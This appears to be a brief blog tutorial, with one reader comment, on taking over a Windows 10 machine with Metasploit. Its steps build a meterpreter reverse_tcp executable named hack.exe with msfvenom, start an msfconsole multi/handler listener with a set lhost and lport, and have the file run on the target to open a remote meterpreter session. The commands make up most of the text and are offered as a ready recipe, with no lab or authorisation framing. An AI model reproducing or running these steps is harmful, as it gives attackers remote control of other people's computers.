Exploiting Windows 10 using payload and reverse_tcp(Metasploit)
         Step 1:- To get your IP address type the following command: ifconfig             Step 2:- Open terminal or Root terminal and type the following command :        msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<Enter your IP> -f exe > hack.exe you can use any lport like lport=4444,lport=8000          Step 3:- Find the file to the main desktop using drag and drop             Step 4:- In the terminal type the following command :   msfconsole   use exploit/multi/handler   set payload windows/x64/meterpreter/reverse_tcp   set lhost 192.168.43.110   set lport 8080   exploit          Step 5:-  Run the file which we put on the main desktop then after you will see the new meterpreter session   open         Step 5:- Type  help...



 
sir can you told me to install kali in vmware workstation.
ReplyDelete